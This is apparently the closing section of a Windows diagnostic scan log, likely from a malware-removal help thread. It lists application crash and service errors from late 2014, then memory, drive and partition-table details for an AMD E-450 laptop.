Description: Error: Initialization failed 0x80070422 Type: 88::UnexpectedError.
Error: (12/02/2014 08:26:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: CCC.exe4.5.0.053ad0dccamdmantle64.dll_unloaded0.0.0.05417637bc0000005000007fee689dee0e0801d00ea07c8a0fa9C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exeamdmantle64.dllc3df7f89-7a93-11e4-a2e3-047d7b5dd3c6
Error: (12/02/2014 08:26:19 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: CCC.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: exception code c0000005, exception address 000007FEE689DEE0
Error: (11/30/2014 07:25:01 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Error: Initialization failed 0x80070422 Type: 88::UnexpectedError.
Error: (11/30/2014 01:20:21 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Error: Initialization failed 0x80070422 Type: 88::UnexpectedError.
Error: (11/30/2014 09:35:34 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Error: Initialization failed 0x80070422 Type: 88::UnexpectedError.
Error: (11/27/2014 07:49:30 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Explorer.EXE6.1.7601.175674d672ee4ntdll.dll6.1.7601.18247521eaf24c000070a000000000005cf9917401d00aabb76e69beC:\Windows\Explorer.EXEC:\Windows\SYSTEM32\ntdll.dllcaf42e1e-76a0-11e4-a193-047d7b5dd3c6
Error: (11/27/2014 07:47:46 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description:
==================== Memory info ===========================
Processor: AMD E-450 APU with Radeon HD Graphics
Percentage of memory in use: 68%
Total physical RAM: 3700.64 MB
Available physical RAM: 1180.94 MB
Total Pagefile: 7401.29 MB
Available Pagefile: 3255.23 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:448.77 GB) (Free:376.44 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:16.89 GB) (Free:2.11 GB) NTFS ==>[System with boot components (obtained from reading drive)]
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: F5400BBB)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=448.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=16.9 GB) - (Type=07 NTFS)
==================== End Of Log ============================